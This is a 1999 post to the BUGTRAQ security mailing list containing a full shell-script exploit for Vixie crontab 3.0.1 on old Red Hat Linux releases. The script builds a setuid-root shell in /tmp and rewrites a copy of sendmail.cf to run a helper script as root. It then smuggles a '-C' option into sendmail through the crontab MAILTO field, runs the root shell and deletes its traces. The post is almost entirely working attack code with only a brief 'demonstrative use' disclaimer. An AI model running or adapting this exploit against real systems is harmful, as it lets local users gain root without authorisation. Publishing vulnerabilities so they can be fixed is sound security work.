Subject: Vixie Crontab exploit code To: BUGTRAQ@SECURITYFOCUS.COM Vixie Crontab exploit code begin vixie-ex ---------------------------------------------------------------------- #!/bin/sh # Vixie crontab exploit # # Local user can gain root access. # # Tested redhat linux : 4.2, 5.0, 5.1, 6.0 # Tested vixie crontab version : 3.0.1 # # This program is only for demonstrative use only. # USE IT AT YOUR OWN RISK! # # Programmed by Taeho Oh 1999/08/31 # # Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara # PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus # PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin export PATH echo echo "Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara" echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus" echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug" echo echo make shell echo cat > /tmp/sh.c << EOF #include #include int main() { setuid(0); setgid(0); execl("/bin/sh","sh",0); return 0; } EOF echo compile shell echo cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c echo make execute shell script echo cat > /tmp/makesh << EOF #!/bin/sh chown root /tmp/sh chgrp root /tmp/sh chmod 4755 /tmp/sh EOF chmod 755 /tmp/makesh echo hack sendmail.cf echo cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1 sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2 sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3 cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf rm -f /tmp/sendmail.cf.tmp1 rm -f /tmp/sendmail.cf.tmp2 rm -f /tmp/sendmail.cf.tmp3 echo make cron file echo cat > /tmp/cronfile << EOF MAILTO=-C/tmp/sendmail.cf `whoami` * * * * * ls EOF echo input cron file echo crontab /tmp/cronfile echo wait for 1 minute echo sec=`date +%S` wait=`expr 65 - $sec` sleep $wait echo execute shell echo /tmp/sh echo delete data files echo cd /tmp rm -f sendmail.cf cronfile makesh sh.c crontab /dev/null ---------------------------------------------------------------------- end vixie-ex -- Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug